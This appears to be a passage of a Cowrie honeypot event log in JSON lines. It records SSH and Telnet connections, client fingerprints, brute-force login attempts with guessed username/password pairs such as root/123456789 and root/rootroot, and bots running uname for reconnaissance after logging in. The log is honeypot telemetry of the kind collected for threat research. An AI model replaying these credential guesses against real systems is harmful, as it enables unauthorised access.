{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53830,"dst_ip":"1.2.3.4","dst_port":22,"session":"31053a7685d0","protocol":"ssh","message":"New connection: 212.227.235.229:53830 (1.2.3.4:22) [session: 31053a7685d0]","sensor":"my-vps","timestamp":"2025-08-31T07:01:50.950342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:01:54.463017Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:01:54.464007Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.session.connect","src_ip":"154.219.111.53","src_port":46042,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c6d2b1c7e84","protocol":"ssh","message":"New connection: 154.219.111.53:46042 (1.2.3.4:22) [session: 3c6d2b1c7e84]","sensor":"my-vps","timestamp":"2025-08-31T07:01:54.715912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:01:54.716586Z","src_ip":"154.219.111.53","session":"3c6d2b1c7e84"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T07:01:54.980950Z","src_ip":"154.219.111.53","session":"3c6d2b1c7e84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:01:57.904390Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T07:01:57.905207Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43600,"dst_ip":"1.2.3.4","dst_port":22,"session":"592abf4b3b8b","protocol":"ssh","message":"New connection: 212.227.235.229:43600 (1.2.3.4:22) [session: 592abf4b3b8b]","sensor":"my-vps","timestamp":"2025-08-31T07:02:01.328309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:02:02.047646Z","src_ip":"212.227.235.229","session":"592abf4b3b8b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:02:02.048609Z","src_ip":"212.227.235.229","session":"592abf4b3b8b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:02.719960Z","src_ip":"154.219.111.53","session":"3c6d2b1c7e84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47280,"dst_ip":"1.2.3.4","dst_port":23,"session":"97ba1f57bc3e","protocol":"telnet","message":"New connection: 212.227.125.160:47280 (1.2.3.4:23) [session: 97ba1f57bc3e]","sensor":"my-vps","timestamp":"2025-08-31T07:02:03.991444Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:02:04.077087Z","src_ip":"212.227.125.160","session":"97ba1f57bc3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:02:04.099215Z","src_ip":"212.227.125.160","session":"97ba1f57bc3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"8.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:06.759931Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
{"eventid":"cowrie.session.closed","duration":"45.0","message":"Connection lost after 45.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:06.761436Z","src_ip":"212.227.125.160","session":"a911fa94abed"}
{"eventid":"cowrie.login.failed","username":"www","password":"12345678","message":"login attempt [www/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:02:07.793131Z","src_ip":"212.227.235.229","session":"592abf4b3b8b"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:09.607353Z","src_ip":"212.227.235.229","session":"592abf4b3b8b"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:02:18.396313Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33344,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2c7c6a75d0e","protocol":"ssh","message":"New connection: 212.227.125.160:33344 (1.2.3.4:22) [session: e2c7c6a75d0e]","sensor":"my-vps","timestamp":"2025-08-31T07:02:22.311222Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48580,"dst_ip":"1.2.3.4","dst_port":22,"session":"d77fa1ee9b51","protocol":"ssh","message":"New connection: 212.227.125.160:48580 (1.2.3.4:22) [session: d77fa1ee9b51]","sensor":"my-vps","timestamp":"2025-08-31T07:02:22.727882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:02:22.939514Z","src_ip":"212.227.125.160","session":"e2c7c6a75d0e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:02:22.940292Z","src_ip":"212.227.125.160","session":"e2c7c6a75d0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:02:23.362725Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T07:02:23.363400Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.login.failed","username":"www","password":"12345678","message":"login attempt [www/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:02:25.808362Z","src_ip":"212.227.125.160","session":"e2c7c6a75d0e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:02:26.657137Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:02:26.682029Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:27.477968Z","src_ip":"212.227.125.160","session":"e2c7c6a75d0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:27.804377Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.session.closed","duration":"36.9","message":"Connection lost after 36.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:27.805577Z","src_ip":"212.227.235.229","session":"31053a7685d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42444,"dst_ip":"1.2.3.4","dst_port":22,"session":"067b8837eb10","protocol":"ssh","message":"New connection: 212.227.235.229:42444 (1.2.3.4:22) [session: 067b8837eb10]","sensor":"my-vps","timestamp":"2025-08-31T07:02:43.742878Z"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:02:46.072453Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:02:48.894992Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:02:48.906345Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:02:54.778092Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T07:02:54.778940Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.session.connect","src_ip":"47.79.84.65","src_port":52850,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ca04ef4db20","protocol":"ssh","message":"New connection: 47.79.84.65:52850 (1.2.3.4:22) [session: 3ca04ef4db20]","sensor":"my-vps","timestamp":"2025-08-31T07:02:56.387923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:02:56.388885Z","src_ip":"47.79.84.65","session":"3ca04ef4db20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:02:56.641663Z","src_ip":"47.79.84.65","session":"3ca04ef4db20"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"abc.123","message":"login attempt [jenkins/abc.123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:02:57.694248Z","src_ip":"47.79.84.65","session":"3ca04ef4db20"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:02:58.950092Z","src_ip":"47.79.84.65","session":"3ca04ef4db20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49360,"dst_ip":"1.2.3.4","dst_port":22,"session":"e48d6f1ac750","protocol":"ssh","message":"New connection: 212.227.235.229:49360 (1.2.3.4:22) [session: e48d6f1ac750]","sensor":"my-vps","timestamp":"2025-08-31T07:03:00.940267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:03:01.759108Z","src_ip":"212.227.235.229","session":"e48d6f1ac750"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:03:01.760121Z","src_ip":"212.227.235.229","session":"e48d6f1ac750"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54360,"dst_ip":"1.2.3.4","dst_port":22,"session":"4955d27621bc","protocol":"ssh","message":"New connection: 212.227.125.160:54360 (1.2.3.4:22) [session: 4955d27621bc]","sensor":"my-vps","timestamp":"2025-08-31T07:03:03.251044Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"9.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:04.006111Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.session.closed","duration":"41.5","message":"Connection lost after 41.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:04.255543Z","src_ip":"212.227.125.160","session":"d77fa1ee9b51"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456789","message":"login attempt [www/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:03:07.966986Z","src_ip":"212.227.235.229","session":"e48d6f1ac750"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:09.785272Z","src_ip":"212.227.235.229","session":"e48d6f1ac750"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:03:21.070191Z","src_ip":"212.227.125.160","session":"4955d27621bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1",